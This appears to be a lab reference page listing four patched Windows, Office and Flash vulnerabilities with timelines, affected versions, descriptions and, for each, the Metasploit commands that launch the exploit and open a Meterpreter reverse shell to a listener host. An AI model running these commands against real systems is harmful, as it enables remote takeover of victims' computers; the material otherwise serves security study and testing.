MS15-132 Office OLE multiple DLL side loading vulnerabilities

Timeline :

Vulnerabilities discovered and reported to the vendor by multiple security researchers
Patched by the vendor via MS15-132 the 2015-12-06
Metasploit PoC provided the 2015–12-25 by Securify

PoC provided by :

Yorick Koster

Reference(s) :

CVE-2015-6128
CVE-2015-6132
CVE-2015-6133
MS15-132

Affected version(s) :

CVE-2015-6128 affects Windows Visa, Server 2008, Windows 7, Server 2008 R2
CVE-2015-6132 affects Windows Visa, Server 2008, Windows 7, Server 2008 R2, 8 and 8.1, 2012 and 2012 R2, RT and RT 8.1, 10
CVE-2015-6133 affects Windows 8 and 8.1, 2012 and 2012 R2, RT and RT 8.1, 10

Tested on :

with Microsoft Office 2013 SP1 on Windows 7 SP1

Description :

Multiple DLL side loading vulnerabilities were found in various COM components. These issues can be exploited by loading various these components as an embedded OLE object. When instantiating a vulnerable object Windows will try to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory also containing the attacker’s DLL file, it is possible to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system.

Commands :

use exploit/windows/fileformat/ms15_132_dll_sideload
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

Share the output in a remote share folder

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

CVE-2014-0497 Adobe Flash Player Integer Underflow Remote Code Execution

Timeline :

Vulnerability discovered exploited in the wild the 2014-02
Patched by the vendor via APSB14-04 the 2014-02-04
Vulnerability reported integrated into exploit kits the 2014-02
Metasploit PoC provided the 2014–05-04

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2014-0497
BID-65327
APSB14-04

Affected version(s) :

Adobe Flash Player 12.0.0.43 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.335 and earlier versions for Linux

Tested on :

with Flash Player 11.7.700.202 Active X version (flashplayer11_7r700_202_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an integer underflow in several avm2 instructions, which can be turned into remote code execution under the context of the user, as exploited in the wild in February 2014. This module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes rop chains for several Flash 11 versions, as exploited in the wild.

Commands :

use exploit/windows/browser/adobe_flash_avm2
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-5331 Adobe Flash Player Type Confusion Remote Code Execution

Timeline :

Vulnerability discovered exploited in the wild the 2013-11
Patched by the vendor via APSB13-28 the 2013-12-10
Metasploit PoC provided the 2014–04-27

PoC provided by :

Unknown
bannedit
juan vazquez

Reference(s) :

CVE-2013-5331
BID-64199
APSB13-28

Affected version(s) :

Adobe Flash Player 11.9.900.152 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.327 and earlier versions for Linux

Tested on :

with Flash Player 11.9.900.152 Active X version (flashplayer11_9r900_152_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a type confusion vulnerability found in the ActiveX component of Adobe Flash Player. This vulnerability was found exploited in the wild in November 2013. This module has been tested successfully on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170 over Windows XP SP3 and Windows 7 SP1.

Commands :

use exploit/windows/browser/adobe_flash_filters_type_confusion
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3918 CardSpaceClaimCollection ActiveX Integer Underflow

Timeline :

Vulnerability discovered exploited in the wild
Patched by the vendor via MS13-090 the 2013-11-12
Metasploit PoC provided the 2013-11-15

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2013-3918
BID-63631
MS13-090

Affected version(s) :

Windows XP SP3, Windows Vista SP2, Windows 7 SP1, Windows 8 and 8.1

Tested on :

with Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a vulnerability on the CardSpaceClaimCollection class from the icardie.dll ActiveX control. The vulnerability exists while the handling of the CardSpaceClaimCollection object. CardSpaceClaimCollections stores a collection of elements on a SafeArray and keeps a size field, counting the number of elements on the collection. By calling the remove() method on an empty CardSpaceClaimCollection it is possible to underflow the length field, storing a negative integer. Later, a call to the add() method will use the corrupted length field to compute the address where write into the SafeArray data, allowing to corrupt memory with a pointer to controlled contents. This module achieves code execution by using VBScript as discovered in the wild on November 2013 to (1) create an array of html OBJECT elements, (2) create holes, (3) create a CardSpaceClaimCollection whose SafeArray data will reuse one of the holes, (4) corrupt one of the legit OBJECT elements with the described integer overflow and (5) achieve code execution by forcing the use of the corrupted OBJECT.

Commands :

use exploit/windows/browser/ms13_090_cardspacesigninhelper
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

Go to Top